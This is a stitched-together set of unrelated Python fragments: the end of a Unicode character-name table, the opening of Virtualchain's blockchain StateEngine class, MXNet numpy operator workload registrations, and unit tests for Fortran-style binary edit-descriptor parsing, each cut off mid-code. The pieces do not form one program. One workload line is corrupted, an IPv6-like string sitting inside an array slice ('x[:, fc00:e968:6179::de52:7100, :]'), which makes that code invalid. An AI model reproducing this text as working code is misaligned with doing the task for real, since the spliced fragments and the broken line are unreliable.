'VARIATION SELECTOR-90': None,
'VARIATION SELECTOR-91': None,
'VARIATION SELECTOR-92': None,
'VARIATION SELECTOR-93': None,
'VARIATION SELECTOR-94': None,
'VARIATION SELECTOR-95': None,
'VARIATION SELECTOR-96': None,
'VARIATION SELECTOR-97': None,
'VARIATION SELECTOR-98': None,
'VARIATION SELECTOR-99': None,
'VEDIC SIGN ANUSVARA ANTARGOMUKHA': None,
'VEDIC SIGN ANUSVARA BAHIRGOMUKHA': None,
'VEDIC SIGN ANUSVARA UBHAYATO MUKHA': None,
'VEDIC SIGN ANUSVARA VAMAGOMUKHA': None,
'VEDIC SIGN ANUSVARA VAMAGOMUKHA WITH TAIL': None,
'VEDIC SIGN ARDHAVISARGA': None,
'VEDIC SIGN HEXIFORM LONG ANUSVARA': None,
'VEDIC SIGN LONG ANUSVARA': None,
'VEDIC SIGN NIHSHVASA': None,
'VEDIC SIGN REVERSED VISARGA ANUDATTA': None,
'VEDIC SIGN REVERSED VISARGA UDATTA': None,
'VEDIC SIGN RTHANG LONG ANUSVARA': None,
'VEDIC SIGN TIRYAK': None,
'VEDIC SIGN VISARGA ANUDATTA': None,
'VEDIC SIGN VISARGA ANUDATTA WITH TAIL': None,
'VEDIC SIGN VISARGA SVARITA': None,
'VEDIC SIGN VISARGA UDATTA': None,
'VEDIC SIGN VISARGA UDATTA WITH TAIL': None,
'VEDIC SIGN YAJURVEDIC MIDLINE SVARITA': None,
'VEDIC TONE ATHARVAVEDIC INDEPENDENT SVARITA': None,
'VEDIC TONE CANDRA BELOW': None,
'VEDIC TONE DOT BELOW': None,
'VEDIC TONE DOUBLE SVARITA': None,
'VEDIC TONE KARSHANA': None,
'VEDIC TONE KATHAKA ANUDATTA': None,
'VEDIC TONE PRENKHA': None,
'VEDIC TONE RIGVEDIC KASHMIRI INDEPENDENT SVARITA': None,
'VEDIC TONE SHARA': None,
'VEDIC TONE THREE DOTS BELOW': None,
'VEDIC TONE TRIPLE SVARITA': None,
'VEDIC TONE TWO DOTS BELOW': None,
'VEDIC TONE YAJURVEDIC AGGRAVATED INDEPENDENT SVARITA': None,
'VEDIC TONE YAJURVEDIC INDEPENDENT SVARITA': None,
'VEDIC TONE YAJURVEDIC KATHAKA INDEPENDENT SVARITA': None,
'VEDIC TONE YAJURVEDIC KATHAKA INDEPENDENT SVARITA SCHROEDER': None,
'VERTICAL BAR WITH HORIZONTAL STROKE': None,
'VERTICAL FOUR DOTS': None,
'VERTICAL LINE EXTENSION': None,
'VERTICAL MALE WITH STROKE SIGN': None,
'VERTICAL TILDE': None,
'VESTA': None,
'VULGAR FRACTION ONE NINTH': None,
'VULGAR FRACTION ONE SEVENTH': None,
'VULGAR FRACTION ONE TENTH': None,
'VULGAR FRACTION ZERO THIRDS': None,
'WARNING SIGN': None,
'WAVE ARROW POINTING DIRECTLY LEFT': None,
'WHEELCHAIR SYMBOL': None,
'WHITE DIAMOND IN SQUARE': None,
'WHITE DRAUGHTS KING': None,
'WHITE DRAUGHTS MAN': None,
'WHITE FLAG': None,
'WHITE FLAG WITH HORIZONTAL MIDDLE BLACK STRIPE': None,
'WHITE HEXAGON': None,
'WHITE HORIZONTAL ELLIPSE': None,
'WHITE LARGE SQUARE': None,
'WHITE LEFT LANE MERGE': None,
'WHITE MEDIUM DIAMOND': None,
'WHITE MEDIUM LOZENGE': None,
'WHITE MEDIUM STAR': None,
'WHITE PENTAGON': None,
'WHITE RIGHT-POINTING PENTAGON': None,
'WHITE SMALL LOZENGE': None,
'WHITE SMALL STAR': None,
'WHITE TRAPEZIUM': None,
'WHITE TRIANGLE CONTAINING SMALL WHITE TRIANGLE': None,
'WHITE TWO-WAY LEFT WAY TRAFFIC': None,
'WHITE VERTICAL ELLIPSE': None,
'WHITE VERY SMALL SQUARE': None,
'WORD SEPARATOR MIDDLE DOT': None,
'YI SYLLABLE ITERATION MARK': None,
}
_cjk_prefix = "CJK UNIFIED IDEOGRAPH-"
_hangul_prefix = 'HANGUL SYLLABLE '
_hangul_L = ['G', 'GG', 'N', 'D', 'DD', 'R', 'M', 'B', 'BB',
'S', 'SS', '', 'J', 'JJ', 'C', 'K', 'T', 'P', 'H']
_hangul_V = ['A', 'AE', 'YA', 'YAE', 'EO', 'E', 'YEO', 'YE', 'O', 'WA', 'WAE',
'OE', 'YO', 'U', 'WEO', 'WE', | |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Virtualchain
~~~~~
copyright: (c) 2014-2015 by Halfmoon Labs, Inc.
copyright: (c) 2016 by Blockstack.org
This file is part of Virtualchain
Virtualchain is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
Virtualchain is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with Virtualchain. If not, see <http://www.gnu.org/licenses/>.
"""
import argparse
import logging
import os
import os.path
import sys
import subprocess
import signal
import json
import datetime
import httplib
import ssl
import threading
import time
import socket
import binascii
import pybitcoin
import copy
import shutil
import time
import traceback
import cPickle as pickle
import imp
import simplejson
from collections import defaultdict
import config
import blockchain.transactions as transactions
import blockchain.session as session
from utilitybelt import is_hex
log = session.get_logger("virtualchain")
RESERVED_KEYS = [
'virtualchain_opcode',
'virtualchain_outputs',
'virtualchain_senders',
'virtualchain_fee',
'virtualchain_block_number',
'virtualchain_accepted',
'virtualchain_txid',
'virtualchain_txindex'
]
class StateEngine( object ):
"""
Client to the virtual chain's database of operations, constructed and
kept synchronized with records in the underlying blockchain. If the blockchain
is the ledger of all operations to have ever been committed
(including invalid and fraudulent ones), then the virtual chain is the sequence
of operations that we're interested in, and the state engine is the logic
for finding and processing the subsequence of these that are "valid."
The purpose of the state engine is to process records from the blockchain in order
to carry out its application's core business logic. This usually means building up a
database over the set of virtual chain records. Virtual chain data are
encoded in transactions data within the underlying cryptocurrency (i.e. OP_RETURNs in Bitcoin).
Each block in the blockchain must be fed into the database, and the blocks'
operations extracted, validated, and accounted for. As such, at block N,
the state engine would have a database represents its current state at block N.
Because the underlying cryptocurrency blockchain can fork, state engine peers need to
determine that they are on the same fork so they will know which virtual chain operations
to process. To do so, the state engine calculates a Merkle tree over the operations processed
from the current block, as well as the root of the previous such tree for the previous block,
and encodes the root hash in each operation. Then, one peer can tell that the other peer's operations
were calculated on the same blockchain fork simply by ensuring that the operation had
the right Merkle root hash for that block. These Merkle root hashes are called
"consensus hashes."
Processing a block happens in seven stages: "parse", "check", "log", "commit", "serialize", "snapshot", and "save"
* "Parsing" a block transaction's nulldata (i.e. from an OP_RETURN) means translating
the OP_RETURN data into a virtual chain operation.
* "Checking" an operation means ensuring the operation is valid.
* "Logging" an operation means staging an operation to be fed into the state engine.
* "Committing" an operation means feeding it into the state engine.
* "Serializing" an operation means turning it into a byte string, in preparation for snapshotting.
* "Snapshotting" means calculating the consensus hash of the state engine, at block N.
* "Saving" means writing the new state to persistent storage.
Blocks are processed in order, and transactions within a block are processed in the order in which
they appear in it.
"""
def __init__(self, magic_bytes, opcodes, opfields, impl=None, state=None, initial_snapshots={}, expected_snapshots={}, backup_frequency=None, backup_max_age=None, read_only=False ):
"""
Construct a state engine client, optionally from locally-cached
state and the set of previously-calculated consensus
hashes for each block.
This class will be fed a sequence of sets of transactions, grouped by block
and ordered by block ID, that each contain an OP_RETURN. The nulldata
assocated with the OP_RETURN will be parsed, checked, logged, and
committed by the implementation (impl). The implementation decides exactly
what each of these mean; this class simply feeds it the transactions
in the order they appeared on the blockchain.
This class looks for OP_RETURN data that starts with the byte sequence in magic_bytes,
and then only select those which start with magic_bytes + op, where op is an
opcode byte in opcodes. Magic bytes can be of variable length, but it should
be specific to this virtual chain.
Expected OP_RETURN data format:
0 M M+1 len(OP_RETURN)-M-1
|-----|--|------------------------|
magic op payload
The job of the implementation is to translate the above data, plus anything else it
can earn from the previously-parsed transactions and from other sources, into a
dictionary of (field: value) tuples that constitute an operation.
@magic_bytes: the `magic` field above.
@opcodes: the list of possible values for the `op` field.
@opfields: a dictionary that maps each `op` to a list of field names.
The caller may supply an optional argument called 'state', which will be
passed into each implementation method. It is meant to preserve implementation-
specific state--in particular, whatever state the implementation expects to be
present.
If @expected_snapshots is given, then this is a dict that maps block heights
to their expected consensus hashes. If the calculated consensus hash does not
match the expected consensus hash, the state engine aborts the program.
"""
self.consensus_hashes = initial_snapshots
self.pending_ops = defaultdict(list)
self.magic_bytes = magic_bytes
self.opcodes = opcodes[:]
self.opfields = copy.deepcopy(opfields)
self.state = state
self.impl = impl
self.lastblock = self.impl.get_first_block_id() - 1
self.pool = None
self.rejected = {}
self.expected_snapshots = expected_snapshots
self.backup_frequency = backup_frequency
self.backup_max_age = backup_max_age
self.read_only = read_only
firsttime = True
consensus_snapshots_filename = config.get_snapshots_filename(impl=impl)
lastblock_filename = config.get_lastblock_filename(impl=impl)
# if we crashed during a commit, and we're openning read-write, try to finish
if not read_only:
rc = self.commit( startup=True )
if not rc:
log.error("Failed to commit partial data. Rolling back and aborting.")
self.rollback()
traceback.print_stack()
os.abort()
# can be missing all files (i.e. this is the first time), or none of them
for fp in [consensus_snapshots_filename, lastblock_filename]:
if os.path.exists( fp ):
# starting with existing data
firsttime = False
# attempt to load the snapshots
if os.path.exists( consensus_snapshots_filename ):
log.debug("consensus snapshots at '%s'" % consensus_snapshots_filename)
try:
with open(consensus_snapshots_filename, 'r') as f:
db_dict = json.loads(f.read())
assert 'snapshots' in db_dict
self.consensus_hashes = db_dict['snapshots']
except Exception, e:
log.error("FATAL: Failed to read consensus snapshots at '%s'. Aborting." % consensus_snapshots_filename )
log.exception(e)
traceback.print_stack()
os.abort()
elif firsttime:
log.debug("consensus snapshots at '%s'" % consensus_snapshots_filename)
try:
with open( consensus_snapshots_filename, 'w') as f:
f.write( json.dumps( {'snapshots': self.consensus_hashes} ) )
f.flush()
except Exception, e:
log.error("FATAL: failed to store initial snapshots to %s. Aborting." % consensus_snapshots_filename )
log.exception(e)
traceback.print_stack()
os.abort()
else:
log.error("FATAL: No such file or directory: %s" % consensus_snapshots_filename )
traceback.print_stack()
os.abort()
# what was the last block processed?
if os.path.exists( lastblock_filename ):
log.debug("lastblock at '%s'" % lastblock_filename)
self.lastblock = self.get_lastblock( lastblock_filename=lastblock_filename )
log.debug("Lastblock: %s (%s)" % (self.lastblock, lastblock_filename))
if self.lastblock is None:
log.error("FATAL: Failed to read last block number at '%s'. Aborting." % lastblock_filename )
log.exception(e)
traceback.print_stack()
os.abort()
elif firsttime:
log.debug("lastblock at '%s'" % lastblock_filename)
try:
log.debug("Store lastblock %s to %s" % (self.lastblock, lastblock_filename))
with open(lastblock_filename, "w") as lastblock_f:
lastblock_f.write("%s" % self.lastblock)
lastblock_f.flush()
except Exception, e:
log.error("FATAL: failed to store initial lastblock to %s. Aborting." % lastblock_filename)
log.exception(e)
traceback.print_stack()
os.abort()
else:
log.error("FATAL: No such file or directory: %s" % lastblock_filename )
traceback.print_stack()
os.abort()
def get_lastblock( self, lastblock_filename=None, impl=None, working_dir=None ):
"""
What was the last block processed?
Return the number on success
Return None on failure to read
"""
if lastblock_filename | |
vec1 = np.array([2])
vec2 = np.array([3, 4]).reshape(1, -1)
for dt in dtype:
v1 = vec1.astype(dt)
v2 = vec2.astype(dt)
OpArgMngr.add_workload('matmul', v1, v2)
OpArgMngr.add_workload('matmul', v2.T, v1)
def test_vector_vector_values():
vec1 = np.array([1, 2])
vec2 = np.array([3, 4]).reshape(-1, 1)
for dt in dtype:
v1 = vec1.astype(dt)
v2 = vec2.astype(dt)
OpArgMngr.add_workload('matmul', v1, v2)
# no broadcast, we must make v1 into a 2d ndarray
OpArgMngr.add_workload('matmul', v2, v1.reshape(1, -1))
def test_vector_matrix_values():
vec = np.array([1, 2])
mat1 = np.array([[1, 2], [3, 4]])
mat2 = np.stack([mat1]*2, axis=0)
for dt in dtype:
v = vec.astype(dt)
m1 = mat1.astype(dt)
m2 = mat2.astype(dt)
OpArgMngr.add_workload('matmul', v, m1)
OpArgMngr.add_workload('matmul', v, m2)
def test_matrix_vector_values():
vec = np.array([1, 2])
mat1 = np.array([[1, 2], [3, 4]])
mat2 = np.stack([mat1]*2, axis=0)
for dt in dtype:
v = vec.astype(dt)
m1 = mat1.astype(dt)
m2 = mat2.astype(dt)
OpArgMngr.add_workload('matmul', m1, v)
OpArgMngr.add_workload('matmul', m2, v)
def test_matrix_matrix_values():
mat1 = np.array([[1, 2], [3, 4]])
mat2 = np.array([[1, 0], [1, 1]])
mat12 = np.stack([mat1, mat2], axis=0)
mat21 = np.stack([mat2, mat1], axis=0)
for dt in dtype:
m1 = mat1.astype(dt)
m2 = mat2.astype(dt)
m12 = mat12.astype(dt)
m21 = mat21.astype(dt)
# matrix @ matrix
OpArgMngr.add_workload('matmul', m1, m2)
OpArgMngr.add_workload('matmul', m2, m1)
# stacked @ matrix
OpArgMngr.add_workload('matmul', m12, m1)
# matrix @ stacked
OpArgMngr.add_workload('matmul', m1, m12)
# stacked @ stacked
OpArgMngr.add_workload('matmul', m12, m21)
test_shapes()
test_result_types()
test_scalar_output()
test_vector_vector_values()
test_vector_matrix_values()
test_matrix_vector_values()
test_matrix_matrix_values()
def _add_workload_vstack(array_pool):
OpArgMngr.add_workload('vstack', (array_pool['4x1'], np.random.uniform(size=(5, 1))))
OpArgMngr.add_workload('vstack', array_pool['4x1'])
OpArgMngr.add_workload('vstack', array_pool['1x1x0'])
def _add_workload_column_stack():
OpArgMngr.add_workload('column_stack', (np.array([1, 2, 3]), np.array([2, 3, 4])))
OpArgMngr.add_workload('column_stack', (np.array([[1], [2], [3]]), np.array([[2], [3], [4]])))
OpArgMngr.add_workload('column_stack', [np.array(_np.arange(3)) for _ in range(2)])
def _add_workload_hstack(array_pool):
OpArgMngr.add_workload('hstack', (np.random.uniform(size=(1, 4)), np.random.uniform(size=(1, 4))))
OpArgMngr.add_workload('hstack', array_pool['4x1'])
OpArgMngr.add_workload('hstack', array_pool['1x1x0'])
def _add_workload_dstack(array_pool):
OpArgMngr.add_workload('dstack', (np.random.uniform(size=(5, 1, 2)), np.random.uniform(size=(5, 1, 3))))
OpArgMngr.add_workload('dstack', array_pool['4x1'])
OpArgMngr.add_workload('dstack', array_pool['1x1x0'])
def _add_workload_equal(array_pool):
# TODO(junwu): fp16 does not work yet with TVM generated ops
# OpArgMngr.add_workload('equal', np.array([0, 1, 2, 4, 2], dtype=np.float16), np.array([-2, 5, 1, 4, 3], dtype=np.float16))
OpArgMngr.add_workload('equal', np.array([0, 1, 2, 4, 2], dtype=np.float32), np.array([-2, 5, 1, 4, 3], dtype=np.float32))
# TODO(junwu): mxnet currently does not have a consistent behavior as NumPy in dealing with np.nan
# OpArgMngr.add_workload('equal', np.array([np.nan]), np.array([np.nan]))
OpArgMngr.add_workload('equal', array_pool['4x1'], array_pool['1x2'])
def _add_workload_not_equal(array_pool):
# TODO(junwu): fp16 does not work yet with TVM generated ops
# OpArgMngr.add_workload('not_equal', np.array([0, 1, 2, 4, 2], dtype=np.float16), np.array([-2, 5, 1, 4, 3], dtype=np.float16))
OpArgMngr.add_workload('not_equal', np.array([0, 1, 2, 4, 2], dtype=np.float32), np.array([-2, 5, 1, 4, 3], dtype=np.float32))
# TODO(junwu): mxnet currently does not have a consistent behavior as NumPy in dealing with np.nan
# OpArgMngr.add_workload('not_equal', np.array([np.nan]), np.array([np.nan]))
OpArgMngr.add_workload('not_equal', array_pool['4x1'], array_pool['1x2'])
def _add_workload_greater(array_pool):
# TODO(junwu): fp16 does not work yet with TVM generated ops
# OpArgMngr.add_workload('greater', np.array([0, 1, 2, 4, 2], dtype=np.float16), np.array([-2, 5, 1, 4, 3], dtype=np.float16))
OpArgMngr.add_workload('greater', np.array([0, 1, 2, 4, 2], dtype=np.float32), np.array([-2, 5, 1, 4, 3], dtype=np.float32))
OpArgMngr.add_workload('greater', array_pool['4x1'], array_pool['1x2'])
OpArgMngr.add_workload('greater', array_pool['4x1'], 2)
OpArgMngr.add_workload('greater', 2, array_pool['4x1'])
# TODO(junwu): mxnet currently does not have a consistent behavior as NumPy in dealing with np.nan
# OpArgMngr.add_workload('greater', np.array([np.nan]), np.array([np.nan]))
def _add_workload_greater_equal(array_pool):
# TODO(junwu): fp16 does not work yet with TVM generated ops
# OpArgMngr.add_workload('greater_equal', np.array([0, 1, 2, 4, 2], dtype=np.float16), np.array([-2, 5, 1, 4, 3], dtype=np.float16))
OpArgMngr.add_workload('greater_equal', np.array([0, 1, 2, 4, 2], dtype=np.float32), np.array([-2, 5, 1, 4, 3], dtype=np.float32))
OpArgMngr.add_workload('greater_equal', array_pool['4x1'], array_pool['1x2'])
OpArgMngr.add_workload('greater_equal', array_pool['4x1'], 2)
OpArgMngr.add_workload('greater_equal', 2, array_pool['4x1'])
# TODO(junwu): mxnet currently does not have a consistent behavior as NumPy in dealing with np.nan
# OpArgMngr.add_workload('greater_equal', np.array([np.nan]), np.array([np.nan]))
def _add_workload_less(array_pool):
# TODO(junwu): fp16 does not work yet with TVM generated ops
# OpArgMngr.add_workload('less', np.array([0, 1, 2, 4, 2], dtype=np.float16), np.array([-2, 5, 1, 4, 3], dtype=np.float16))
OpArgMngr.add_workload('less', np.array([0, 1, 2, 4, 2], dtype=np.float32), np.array([-2, 5, 1, 4, 3], dtype=np.float32))
OpArgMngr.add_workload('less', array_pool['4x1'], array_pool['1x2'])
OpArgMngr.add_workload('less', array_pool['4x1'], 2)
OpArgMngr.add_workload('less', 2, array_pool['4x1'])
# TODO(junwu): mxnet currently does not have a consistent behavior as NumPy in dealing with np.nan
# OpArgMngr.add_workload('less', np.array([np.nan]), np.array([np.nan]))
def _add_workload_less_equal(array_pool):
# TODO(junwu): fp16 does not work yet with TVM generated ops
# OpArgMngr.add_workload('less_equal', np.array([0, 1, 2, 4, 2], dtype=np.float16), np.array([-2, 5, 1, 4, 3], dtype=np.float16))
OpArgMngr.add_workload('less_equal', np.array([0, 1, 2, 4, 2], dtype=np.float32), np.array([-2, 5, 1, 4, 3], dtype=np.float32))
OpArgMngr.add_workload('less_equal', array_pool['4x1'], array_pool['1x2'])
OpArgMngr.add_workload('less_equal', array_pool['4x1'], 2)
OpArgMngr.add_workload('less_equal', 2, array_pool['4x1'])
# TODO(junwu): mxnet currently does not have a consistent behavior as NumPy in dealing with np.nan
# OpArgMngr.add_workload('less_equal', np.array([np.nan]), np.array([np.nan]))
def _add_workload_logical_and(array_pool):
OpArgMngr.add_workload('logical_and', np.array([0, 1, 2, 4, 2], dtype=np.float32), np.array([-2, 5, 1, 4, 3], dtype=np.float32))
OpArgMngr.add_workload('logical_and', np.array([False, False, True, True], dtype=np.bool),
np.array([False, True, False, True], dtype=np.bool))
def _add_workload_logical_or(array_pool):
OpArgMngr.add_workload('logical_or', np.array([0, 1, 2, 4, 2], dtype=np.bool), np.array([-2, 5, 1, 4, 3], dtype=np.bool))
OpArgMngr.add_workload('logical_or', np.array([False, False, True, True], dtype=np.bool),
np.array([False, True, False, True], dtype=np.bool))
def _add_workload_logical_xor(array_pool):
OpArgMngr.add_workload('logical_xor', np.array([0, 1, 2, 4, 2], dtype=np.float32), np.array([-2, 5, 1, 4, 3], dtype=np.float32))
OpArgMngr.add_workload('logical_xor', np.array([False, False, True, True], dtype=np.bool),
np.array([False, True, False, True], dtype=np.bool))
def _add_workload_where():
c = np.ones(53).astype(bool)
d = np.ones_like(c)
e = np.zeros_like(c)
OpArgMngr.add_workload('where', c, e, e)
OpArgMngr.add_workload('where', c, d, e)
OpArgMngr.add_workload('where', c, d, e[0])
OpArgMngr.add_workload('where', c, d[0], e)
# OpArgMngr.add_workload('where', c[::2], d[::2], e[::2])
# OpArgMngr.add_workload('where', c[1::2], d[1::2], e[1::2])
# OpArgMngr.add_workload('where', c[::3], d[::3], e[::3])
# OpArgMngr.add_workload('where', c[1::3], d[1::3], e[1::3])
# OpArgMngr.add_workload('where', c[::-2], d[::-2], e[::-2])
# OpArgMngr.add_workload('where', c[::-3], d[::-3], e[::-3])
# OpArgMngr.add_workload('where', c[1::-3], d[1::-3], e[1::-3])
c = np.array([True, False])
a = np.zeros((2, 25))
b = np.ones((2, 25))
OpArgMngr.add_workload('where', c.reshape((2, 1)), a, b)
OpArgMngr.add_workload('where', c, a.T, b.T)
def _add_workload_pad():
array = _np.array([[1, 2, 3], [1, 2, 3]])
pad_width = ((5, 5), (5,5))
array = np.array(array)
OpArgMngr.add_workload('pad', array, pad_width, mode="constant", constant_values=0)
OpArgMngr.add_workload('pad', array, pad_width, mode="edge")
OpArgMngr.add_workload('pad', array, pad_width, mode="symmetric", reflect_type="even")
OpArgMngr.add_workload('pad', array, pad_width, mode="reflect", reflect_type="even")
OpArgMngr.add_workload('pad', array, pad_width, mode="maximum")
OpArgMngr.add_workload('pad', array, pad_width, mode="minimum")
def _add_workload_nonzero():
OpArgMngr.add_workload('nonzero', np.random.randint(0, 2))
OpArgMngr.add_workload('nonzero', np.random.randint(0, 2, size=()))
OpArgMngr.add_workload('nonzero', np.random.randint(0, 2, size=(0, 1, 2)))
OpArgMngr.add_workload('nonzero', np.random.randint(0, 2, size=(0, 1, 0)))
OpArgMngr.add_workload('nonzero', np.random.randint(0, 2, size=(2, 3, 4)))
OpArgMngr.add_workload('nonzero', np.array([False, False, False], dtype=np.bool_))
OpArgMngr.add_workload('nonzero', np.array([True, False, False], dtype=np.bool_))
def _add_workload_diagflat():
def get_mat(n):
data = _np.arange(n)
data = _np.add.outer(data,data)
return data
A = np.array([[1,2],[3,4],[5,6]])
vals = (100 * np.arange(5)).astype('l')
vals_c = (100 * np.array(get_mat(5)) + 1).astype('l')
vals_f = _np.array((100 * get_mat(5) + 1), order='F', dtype='l')
vals_f = np.array(vals_f)
OpArgMngr.add_workload('diagflat', A, k=2)
OpArgMngr.add_workload('diagflat', A, k=1)
OpArgMngr.add_workload('diagflat', A, k=0)
OpArgMngr.add_workload('diagflat', A, k=-1)
OpArgMngr.add_workload('diagflat', A, k=-2)
OpArgMngr.add_workload('diagflat', A, k=-3)
OpArgMngr.add_workload('diagflat', vals, k=0)
OpArgMngr.add_workload('diagflat', vals, k=2)
OpArgMngr.add_workload('diagflat', vals, k=-2)
OpArgMngr.add_workload('diagflat', vals_c, k=0)
OpArgMngr.add_workload('diagflat', vals_c, k=2)
OpArgMngr.add_workload('diagflat', vals_c, k=-2)
OpArgMngr.add_workload('diagflat', vals_f, k=0)
OpArgMngr.add_workload('diagflat', vals_f, k=2)
OpArgMngr.add_workload('diagflat', vals_f, k=-2)
def _add_workload_shape():
OpArgMngr.add_workload('shape', np.random.uniform(size=()))
OpArgMngr.add_workload('shape', np.random.uniform(size=(0, 1)))
OpArgMngr.add_workload('shape', np.random.uniform(size=(2, 3)))
def _add_workload_diff():
x = np.array([1, 4, 6, 7, 12])
OpArgMngr.add_workload('diff', x)
OpArgMngr.add_workload('diff', x, 2)
OpArgMngr.add_workload('diff', x, 3)
OpArgMngr.add_workload('diff', np.array([1.1, 2.2, 3.0, -0.2, -0.1]))
x = np.zeros((10, 20, 30))
x[:, fc00:e968:6179::de52:7100, :] = 1
OpArgMngr.add_workload('diff', x)
OpArgMngr.add_workload('diff', x, axis=-1)
OpArgMngr.add_workload('diff', x, axis=0)
OpArgMngr.add_workload('diff', x, axis=1)
OpArgMngr.add_workload('diff', x, axis=-2)
x = 20 * np.random.uniform(size=(10,20,30))
OpArgMngr.add_workload('diff', x)
OpArgMngr.add_workload('diff', x, n=2)
OpArgMngr.add_workload('diff', x, axis=0)
OpArgMngr.add_workload('diff', x, n=2, axis=0)
x = np.array([list(range(3))])
for n in range(1, 5):
OpArgMngr.add_workload('diff', x, n=n)
def _add_workload_ediff1d():
x = np.array([1, 3, 6, 7, 1])
OpArgMngr.add_workload('ediff1d', x)
OpArgMngr.add_workload('ediff1d', x, 2, 4)
OpArgMngr.add_workload('ediff1d', x, x, 3)
OpArgMngr.add_workload('ediff1d', x, x, x)
OpArgMngr.add_workload('ediff1d', np.array([1.1, 2.2, 3.0, -0.2, -0.1]))
x = np.random.randint(5, size=(5, 0, 4))
OpArgMngr.add_workload('ediff1d', x)
OpArgMngr.add_workload('ediff1d', x, 2, 4)
OpArgMngr.add_workload('ediff1d', x, x, 3)
OpArgMngr.add_workload('ediff1d', x, x, x)
def _add_workload_resize():
OpArgMngr.add_workload('resize', np.array([[1, 0, 0], [0, 1, 0], [0, 0, 1]], dtype=np.int32), (5, 1))
OpArgMngr.add_workload('resize', np.eye(3), 3)
OpArgMngr.add_workload('resize', np.ones(1), ())
OpArgMngr.add_workload('resize', np.ones(()), (1,))
OpArgMngr.add_workload('resize', np.eye(3), (3, 2, 1))
OpArgMngr.add_workload('resize', np.eye(3), (2, 3, 3))
OpArgMngr.add_workload('resize', np.ones(10), 15)
OpArgMngr.add_workload('resize', np.zeros((10, 0)), (0, 10))
OpArgMngr.add_workload('resize', np.zeros((10, 0)), (0, 100))
def _add_workload_empty_like():
OpArgMngr.add_workload('empty_like', np.random.uniform(low=0, high=100, size=(1,3,4), dtype='float64'))
OpArgMngr.add_workload('empty_like', np.random.uniform(low=0, high=100, size=(9,3,1)), np.int32)
OpArgMngr.add_workload('empty_like', np.random.uniform(low=0, high=100, size=(9,3)), 'float32')
OpArgMngr.add_workload('empty_like', np.random.uniform(low=0, high=100, size=(9,3,1)), np.bool_)
OpArgMngr.add_workload('empty_like', np.random.uniform(low=0, high=100, size=(0,3)), np.float32)
def _add_workload_nan_to_num():
array1 = np.array([[-433, 0, 456, _np.inf], [-1, -_np.inf, 0, 1]])
array2 = np.array([_np.nan, _np.inf, -_np.inf, -574, 0, 23425, 24234,-5])
array3 = np.array(-_np.inf)
OpArgMngr.add_workload('nan_to_num', array1, True, 0, 100, -100)
OpArgMngr.add_workload('nan_to_num', array1, True, 0.00)
OpArgMngr.add_workload('nan_to_num', array2, True)
OpArgMngr.add_workload('nan_to_num', array2, True, -2000, 10000, -10000)
OpArgMngr.add_workload('nan_to_num', array3, True)
def _add_workload_isnan(array_pool):
OpArgMngr.add_workload('isnan', array_pool['2x4'])
def _add_workload_isinf(array_pool):
OpArgMngr.add_workload('isinf', array_pool['2x4'])
def _add_workload_isposinf(array_pool):
OpArgMngr.add_workload('isposinf', array_pool['2x4'])
def _add_workload_isneginf(array_pool):
OpArgMngr.add_workload('isneginf', array_pool['2x4'])
def _add_workload_isfinite(array_pool):
OpArgMngr.add_workload('isfinite', array_pool['2x4'])
def _add_workload_polyval():
p1 = np.arange(20)
p2 = np.arange(1)
x1 = np.arange(20)
x2 = np.ones((3,3))
x3 = np.array(2)
OpArgMngr.add_workload('polyval', p1, x1)
OpArgMngr.add_workload('polyval', p1, x2)
OpArgMngr.add_workload('polyval', p1, x3)
OpArgMngr.add_workload('polyval', p2, x1)
OpArgMngr.add_workload('polyval', p2, x2)
OpArgMngr.add_workload('polyval', p2, x3)
def _add_workload_linalg_cond():
A = np.array([[1., | |
_input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_673(self):
inp = '''1000'''
fmt = '''(B3.3)'''
result = [4]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_674(self):
inp = '''-1000'''
fmt = '''(B3.3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_675(self):
inp = '''10000'''
fmt = '''(B3.3)'''
result = [4]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_676(self):
inp = '''-10000'''
fmt = '''(B3.3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_677(self):
inp = '''100000'''
fmt = '''(B3.3)'''
result = [4]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_678(self):
inp = '''-100000'''
fmt = '''(B3.3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_679(self):
inp = '''10 0 00 10 0 0 1'''
fmt = '''(B3.3)'''
result = [2]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_680(self):
inp = '''10101000'''
fmt = '''(B3.3)'''
result = [5]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_681(self):
inp = '''0'''
fmt = '''(B4.3)'''
result = [0]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_682(self):
inp = '''-0'''
fmt = '''(B4.3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
